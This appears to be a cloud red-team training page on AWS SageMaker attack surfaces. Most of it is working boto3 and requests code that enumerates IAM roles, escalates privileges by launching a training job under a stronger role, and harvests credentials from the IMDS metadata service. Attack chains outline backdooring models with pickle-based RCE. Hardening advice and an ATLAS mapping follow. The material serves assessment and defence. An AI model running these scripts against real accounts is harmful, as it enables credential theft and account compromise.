AWS SageMaker Attack Surface
Security assessment of AWS SageMaker -- IAM role exploitation, endpoint abuse, notebook server attacks, and training pipeline manipulation.
SageMaker Architecture Overview
AWS SageMaker provides managed services for the complete ML lifecycle: data labeling, notebooks, training, model hosting, and MLOps pipelines. Each component has distinct security boundaries and IAM requirements.
Key Components and Attack Surfaces
| Component | IAM Principal | Storage | Network | Risk Level |
|---|---|---|---|---|
| Studio/Notebooks | Execution role | EFS/S3 | VPC optional | High |
| Training Jobs | Training role | S3 input/output | VPC optional | High |
| Endpoints | Endpoint role | ECR/S3 model | Internet-facing | Critical |
| Pipelines | Pipeline role | S3 artifacts | VPC optional | Medium |
| Feature Store | Feature role | S3/Glue | VPC | Medium |
Attack Techniques
1. Execution Role Exploitation
SageMaker notebook instances run with an IAM execution role. If the role is overprivileged -- a frequent finding since data scientists need access to diverse AWS services during experimentation -- compromising the notebook grants broad access. The AmazonSageMakerFullAccess managed policy, commonly attached during setup, grants permissions far beyond what most notebooks require, including access to all S3 buckets with sagemaker in the name, ECR repositories, and CloudWatch logs across the account.
import boto3
import requests
# From inside a SageMaker notebook, enumerate the execution role
sts = boto3.client('sts')
identity = sts.get_caller_identity()
print(f"Role ARN: {identity['Arn']}")
# Check what the role can do
iam = boto3.client('iam')
role_name = identity['Arn'].split('/')[-1]
# List attached policies
policies = iam.list_attached_role_policies(RoleName=role_name)
for policy in policies['AttachedPolicies']:
print(f"Policy: {policy['PolicyName']}")
# Get policy document to check permissions
version = iam.get_policy(PolicyArn=policy['PolicyArn'])['Policy']['DefaultVersionId']
doc = iam.get_policy_version(PolicyArn=policy['PolicyArn'], VersionId=version)
print(doc['PolicyVersion']['Document'])Privilege Escalation via Role Chaining
SageMaker environments often involve multiple IAM roles: the notebook execution role, training job roles, endpoint roles, and pipeline execution roles. If the execution role can pass roles to other SageMaker resources (via iam:PassRole), an attacker can escalate privileges by launching a training job with a more permissive role.
import boto3
import json
iam = boto3.client('iam')
sm = boto3.client('sagemaker')
sts = boto3.client('sts')
identity = sts.get_caller_identity()
current_role = identity['Arn'].split('/')[-1]
# Check if the role can pass other roles
try:
# List all roles in the account
roles = iam.list_roles()['Roles']
sagemaker_roles = [
r for r in roles
if 'sagemaker' in r['RoleName'].lower()
or 'SageMaker' in json.dumps(r.get('AssumeRolePolicyDocument', {}))
]
print(f"Current role: {current_role}")
print(f"SageMaker-related roles found: {len(sagemaker_roles)}")
for role in sagemaker_roles:
print(f" {role['RoleName']} - {role['Arn']}")
# Check if this role has more permissions
attached = iam.list_attached_role_policies(
RoleName=role['RoleName']
)['AttachedPolicies']
for policy in attached:
print(f" Policy: {policy['PolicyName']}")
except Exception as e:
print(f"Cannot enumerate roles: {e}")
# Attempt to create a training job with a higher-privilege role
def escalate_via_training_job(target_role_arn):
"""Launch a training job that exfiltrates credentials from a
higher-privilege role."""
sm.create_training_job(
TrainingJobName='security-test-escalation',
RoleArn=target_role_arn, # The higher-privilege role
AlgorithmSpecification={
'TrainingImage': '763104351884.dkr.ecr.us-east-1.amazonaws.com/'
'pytorch-training:2.0.0-cpu-py310',
'TrainingInputMode': 'File'
},
ResourceConfig={
'InstanceType': 'ml.m5.large',
'InstanceCount': 1,
'VolumeSizeInGB': 10
},
StoppingCondition={'MaxRuntimeInSeconds': 300},
InputDataConfig=[{
'ChannelName': 'training',
'DataSource': {
'S3DataSource': {
'S3DataType': 'S3Prefix',
'S3Uri': 's3://bucket/data/'
}
}
}],
OutputDataConfig={
'S3OutputPath': 's3://bucket/output/'
}
)2. IMDS Credential Harvesting
SageMaker notebook instances expose the Instance Metadata Service. Older instances default to IMDSv1 (no session token required), making credential theft trivial. Even with IMDSv2, code executing in the notebook context can perform the required PUT request to obtain a session token.
# SageMaker instances use IMDS v1 by default (may be v2 in newer configs)
import requests
# Get temporary credentials from instance metadata
role_name = requests.get(
'http://169.254.169.254/latest/meta-data/iam/security-credentials/'
).text
creds = requests.get(
f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}'
).json()
print(f"AccessKeyId: {creds['AccessKeyId']}")
print(f"SecretAccessKey: {creds['SecretAccessKey']}")
print(f"Token: {creds['Token']}")IMDSv2 Credential Harvesting
When IMDSv2 is enforced, the attacker must first obtain a session token. This is still possible from code running on the instance.
import requests
# IMDSv2 requires a PUT to get a session token first
token_resp = requests.put(
'http://169.254.169.254/latest/api/token',
headers={'X-aws-ec2-metadata-token-ttl-seconds': '21600'}
)
imds_token = token_resp.text
# Use the token to access metadata
headers = {'X-aws-ec2-metadata-token': imds_token}
# Get instance identity document
identity = requests.get(
'http://169.254.169.254/latest/dynamic/instance-identity/document',
headers=headers
).json()
print(f"Region: {identity['region']}")
print(f"Account: {identity['accountId']}")
print(f"Instance: {identity['instanceId']}")
# Get credentials
role_name = requests.get(
'http://169.254.169.254/latest/meta-data/iam/security-credentials/',
headers=headers
).text
creds = requests.get(
f'http://169.254.169.254/latest/meta-data/iam/security-credentials/{role_name}',
headers=headers
).json()
print(f"Access Key: {creds['AccessKeyId']}")
print(f"Expiration: {creds['Expiration']}")
# Also extract user-data (may contain initialization scripts with secrets)
user_data = requests.get(
'http://169.254.169.254/latest/user-data',
headers=headers
).text
print(f"User data length: {len(user_data)} bytes")
if user_data:
# Check for common secrets in user data
for keyword in ['password', 'secret', 'token', 'key', 'credential']:
if keyword.lower() in user_data.lower():
print(f" [!] User data may contain '{keyword}'")3. Endpoint Enumeration and Testing
SageMaker endpoints serve model predictions and are often the most exposed component -- they handle production traffic and may be accessible from VPCs, other AWS accounts, or even the internet via API Gateway.
import boto3
sm = boto3.client('sagemaker')
runtime = boto3.client('sagemaker-runtime')
# List all endpoints
endpoints = sm.list_endpoints()['Endpoints']
for ep in endpoints:
config = sm.describe_endpoint(EndpointName=ep['EndpointName'])
print(f"Endpoint: {ep['EndpointName']}")
print(f" Status: {config['EndpointStatus']}")
print(f" Created: {config['CreationTime']}")
# Attempt invocation
try:
response = runtime.invoke_endpoint(
EndpointName=ep['EndpointName'],
ContentType='application/json',
Body='{"inputs": "test"}'
)
print(f" Response: {response['Body'].read()[:200]}")
except Exception as e:
print(f" Error: {e}")Deep Endpoint Security Analysis
import boto3
import json
sm = boto3.client('sagemaker')
def analyze_endpoint_security(endpoint_name):
"""Comprehensive endpoint security assessment."""
# Get endpoint config
endpoint = sm.describe_endpoint(EndpointName=endpoint_name)
config_name = endpoint['EndpointConfigName']
config = sm.describe_endpoint_config(EndpointConfigName=config_name)
results = {"endpoint": endpoint_name, "findings": []}
# Check VPC configuration
for variant in config['ProductionVariants']:
model = sm.describe_model(ModelName=variant['ModelName'])
# Check if model runs in VPC
if 'VpcConfig' not in model:
results["findings"].append({
"severity": "HIGH",
"finding": f"Model {variant['ModelName']} not in VPC"
})
# Check the model execution role
role_arn = model['ExecutionRoleArn']
results["findings"].append({
"severity": "INFO",
"finding": f"Model role: {role_arn}"
})
# Check container image source
container = model.get('PrimaryContainer', {})
image = container.get('Image', 'Unknown')
results["findings"].append({
"severity": "INFO",
"finding": f"Container image: {image}"
})
# Check for model data (S3 path to model artifacts)
model_data = container.get('ModelDataUrl', 'None')
if model_data != 'None':
results["findings"].append({
"severity": "MEDIUM",
"finding": f"Model artifacts at: {model_data}"
})
# Check data capture configuration (may leak inference data)
if 'DataCaptureConfig' in config:
capture = config['DataCaptureConfig']
if capture.get('EnableCapture'):
results["findings"].append({
"severity": "MEDIUM",
"finding": f"Data capture enabled -> {capture.get('DestinationS3Uri')}"
})
return results
# Run analysis for all endpoints
for ep in sm.list_endpoints()['Endpoints']:
analysis = analyze_endpoint_security(ep['EndpointName'])
print(json.dumps(analysis, indent=2, default=str))4. Training Data Exfiltration
SageMaker stores training data, model artifacts, and pipeline outputs in S3. The default bucket naming convention (sagemaker-{region}-{account_id}) makes discovery straightforward. Beyond the default bucket, training jobs reference input and output S3 paths that may point to sensitive data lakes.
# Enumerate S3 buckets used by SageMaker
s3 = boto3.client('s3')
buckets = s3.list_buckets()['Buckets']
sagemaker_buckets = [b for b in buckets if 'sagemaker' in b['Name'].lower()]
for bucket in sagemaker_buckets:
print(f"\nBucket: {bucket['Name']}")
objects = s3.list_objects_v2(Bucket=bucket['Name'], MaxKeys=20)
for obj in objects.get('Contents', []):
print(f" {obj['Key']} ({obj['Size']} bytes)")Extracting Training Data from Job History
import boto3
sm = boto3.client('sagemaker')
s3 = boto3.client('s3')
# List recent training jobs to find data locations
jobs = sm.list_training_jobs(
SortBy='CreationTime',
SortOrder='Descending',
MaxResults=20
)
for job_summary in jobs['TrainingJobSummaries']:
job = sm.describe_training_job(
TrainingJobName=job_summary['TrainingJobName']
)
print(f"\nJob: {job['TrainingJobName']}")
print(f" Status: {job['TrainingJobStatus']}")
print(f" Role: {job['RoleArn']}")
# Extract input data locations
for channel in job.get('InputDataConfig', []):
s3_uri = channel['DataSource']['S3DataSource']['S3Uri']
print(f" Input ({channel['ChannelName']}): {s3_uri}")
# Extract output location
output_uri = job['OutputDataConfig']['S3OutputPath']
print(f" Output: {output_uri}")
# Extract model artifacts (the trained model)
if 'ModelArtifacts' in job:
model_uri = job['ModelArtifacts']['S3ModelArtifacts']
print(f" Model: {model_uri}")
# Check for hyperparameters (may contain secrets or API keys)
hyperparams = job.get('HyperParameters', {})
for key, value in hyperparams.items():
if any(kw in key.lower() for kw in
['key', 'secret', 'token', 'password', 'api']):
print(f" [!] Suspicious hyperparameter: {key}={value[:20]}...")5. ECR Container Image Attacks
SageMaker uses Amazon ECR to store container images for training and inference. Compromising ECR access enables supply chain attacks where legitimate images are replaced with backdoored versions that exfiltrate data or inject model backdoors during training.
import boto3
import json
ecr = boto3.client('ecr')
# List all repositories
repos = ecr.describe_repositories()['repositories']
ml_repos = [r for r in repos if any(
kw in r['repositoryName'].lower()
for kw in ['sagemaker', 'ml', 'model', 'inference', 'training']
)]
for repo in ml_repos:
print(f"\nRepository: {repo['repositoryName']}")
print(f" URI: {repo['repositoryUri']}")
print(f" Created: {repo['createdAt']}")
# Check image scan findings
images = ecr.list_images(
repositoryName=repo['repositoryName'],
maxResults=5
)['imageIds']
for image in images:
if 'imageTag' in image:
print(f" Image: {image['imageTag']}")
try:
scan = ecr.describe_image_scan_findings(
repositoryName=repo['repositoryName'],
imageId=image
)
vulns = scan['imageScanFindings']['findingSeverityCounts']
print(f" Vulnerabilities: {json.dumps(vulns)}")
except ecr.exceptions.ScanNotFoundException:
print(f" [!] No vulnerability scan results")
# Check repository policy (who can push/pull)
try:
policy = ecr.get_repository_policy(
repositoryName=repo['repositoryName']
)
policy_doc = json.loads(policy['policyText'])
for stmt in policy_doc.get('Statement', []):
print(f" Policy: {stmt.get('Effect')} - "
f"{stmt.get('Principal', {})}")
except ecr.exceptions.RepositoryPolicyNotFoundException:
print(f" No repository policy (default account access only)")6. SageMaker Studio Domain Exploitation
SageMaker Studio organizes user environments into domains and user profiles. A compromised Studio domain can expose all users' work, shared spaces, and the underlying EFS filesystem that stores notebooks and data.
import boto3
sm = boto3.client('sagemaker')
efs = boto3.client('efs')
# List Studio domains
domains = sm.list_domains()['Domains']
for domain in domains:
detail = sm.describe_domain(DomainId=domain['DomainId'])
print(f"\nDomain: {detail['DomainName']}")
print(f" Auth: {detail['AuthMode']}")
print(f" VPC: {detail.get('VpcId', 'No VPC')}")
print(f" EFS: {detail.get('HomeEfsFileSystemId', 'N/A')}")
# Default execution role applies to all users
default_settings = detail.get('DefaultUserSettings', {})
print(f" Default role: {default_settings.get('ExecutionRole', 'N/A')}")
# List user profiles
profiles = sm.list_user_profiles(DomainIdEquals=domain['DomainId'])
for profile in profiles['UserProfiles']:
user_detail = sm.describe_user_profile(
DomainId=domain['DomainId'],
UserProfileName=profile['UserProfileName']
)
user_role = user_detail.get('UserSettings', {}).get('ExecutionRole')
print(f" User: {profile['UserProfileName']} "
f"(role: {user_role or 'uses default'})")
# Check if the EFS is accessible
if 'HomeEfsFileSystemId' in detail:
efs_id = detail['HomeEfsFileSystemId']
try:
fs = efs.describe_file_systems(FileSystemId=efs_id)
print(f" EFS size: {fs['FileSystems'][0]['SizeInBytes']['Value']} bytes")
# Check mount targets for network exposure
mounts = efs.describe_mount_targets(FileSystemId=efs_id)
for mt in mounts['MountTargets']:
print(f" EFS mount: {mt['IpAddress']} in {mt['SubnetId']}")
except Exception as e:
print(f" EFS access error: {e}")Defensive Assessment Checklist
| Control Area | What to Verify | Common Finding |
|---|---|---|
| IAM Roles | Least-privilege execution roles per component | AmazonSageMakerFullAccess attached to all roles |
| IMDS | IMDSv2 enforced on notebook instances | IMDSv1 still enabled (default on older instances) |
| Network | VPC isolation for notebooks, training, and endpoints | No VPC configuration (default) |
| S3 | Bucket policies, encryption, versioning, access logging | Public or overly permissive bucket policies |
| ECR | Image scanning, repository policies, immutable tags | No vulnerability scanning configured |
| Logging | CloudTrail, CloudWatch, SageMaker Experiments logging | Incomplete logging of SageMaker API calls |
| Encryption | KMS keys for S3, EBS, EFS, and inter-node training | Default AWS-managed keys (no customer control) |
| Endpoint | IAM authorization, VPC endpoints, resource policies | No IAM conditions on endpoint invocation |
Recommended Hardening
- Replace
AmazonSageMakerFullAccesswith custom policies scoped to specific S3 paths, ECR repositories, and SageMaker resources. - Enforce IMDSv2 on all notebook instances by setting
MinimumInstanceMetadataServiceVersionto2. - Deploy all components into VPC with private subnets and VPC endpoints for S3, ECR, SageMaker API, and SageMaker Runtime.
- Enable S3 bucket versioning and access logging on all SageMaker-related buckets to detect unauthorized access or modification.
- Use separate IAM roles for notebooks, training jobs, and endpoints, each scoped to only the resources they need.
- Enable ECR image scanning and enforce image immutability to prevent supply chain attacks.
- Enable CloudTrail data events for S3 buckets containing training data and model artifacts.
- Use SageMaker Model Cards and Model Registry to track model provenance and prevent unauthorized model deployment.
Common Attack Chains
Chain 1: Notebook to Full Account Compromise
1. Initial access: Compromised data scientist credentials or malicious .ipynb file
2. IMDS credential harvesting from notebook instance
3. Enumerate IAM role permissions -- discover AmazonSageMakerFullAccess
4. List S3 buckets matching sagemaker-* pattern
5. Access training data, model artifacts, and pipeline outputs
6. Discover iam:PassRole permission in the execution role
7. Launch training job with a higher-privilege role
8. Use escalated role to access non-SageMaker resources (RDS, DynamoDB, etc.)Chain 2: Model Registry Poisoning
1. Gain access to a SageMaker execution role with model registry permissions
2. Download the latest approved model from S3
3. Modify model artifact to include a backdoor (e.g., pickle-based RCE in PyTorch model)
4. Register the modified model as a new version in the model registry
5. If automatic deployment is configured, the backdoored model reaches production
6. Backdoored model executes attacker code on every inference requestChain 3: Cross-Account Pivot via Endpoint
1. Discover SageMaker endpoint with cross-account IAM trust
2. Invoke endpoint with crafted payloads to test for model vulnerabilities
3. If model inference container has outbound network access, use it as proxy
4. Leverage endpoint role's cross-account permissions to access resources
in other AWS accounts within the organizationMITRE ATLAS Mapping for SageMaker Attacks
| Attack Technique | ATLAS ID | SageMaker-Specific Context |
|---|---|---|
| IMDS credential harvesting | AML.TA0002 (Initial Access) | Notebook execution roles with broad S3/ECR access |
| S3 training data access | AML.T0000 (Search for Victim's Data) | Default sagemaker-* bucket naming convention aids discovery |
| Endpoint enumeration | AML.T0002 (Active Scanning) | sagemaker:ListEndpoints reveals all deployed models |
| Model extraction via endpoint | AML.T0024 (Model Extraction) | Endpoint invocation with systematic queries |
| ECR image tampering | AML.T0018 (Backdoor ML Model) | Replace inference container image in ECR |
| Training data poisoning | AML.T0020 (Data Poisoning) | Modify S3 training data between pipeline runs |
Related Topics
- Cloud AI Infrastructure -- Cross-platform overview
- API Security -- Endpoint security fundamentals
- Model Supply Chain -- Model artifact security
References
- AWS SageMaker Security Documentation - Amazon Web Services (2024) - Official SageMaker security best practices
- "Securing Machine Learning Workloads on AWS" - AWS Well-Architected ML Lens (2023) - ML security architecture guidance
- CVE-2024-34073 - SageMaker notebook instance IMDS access control bypass
- "Cloud Security Alliance AI Safety Initiative" - CSA (2024) - Industry guidance on securing cloud AI platforms
Why is IMDS credential harvesting particularly dangerous on SageMaker notebook instances?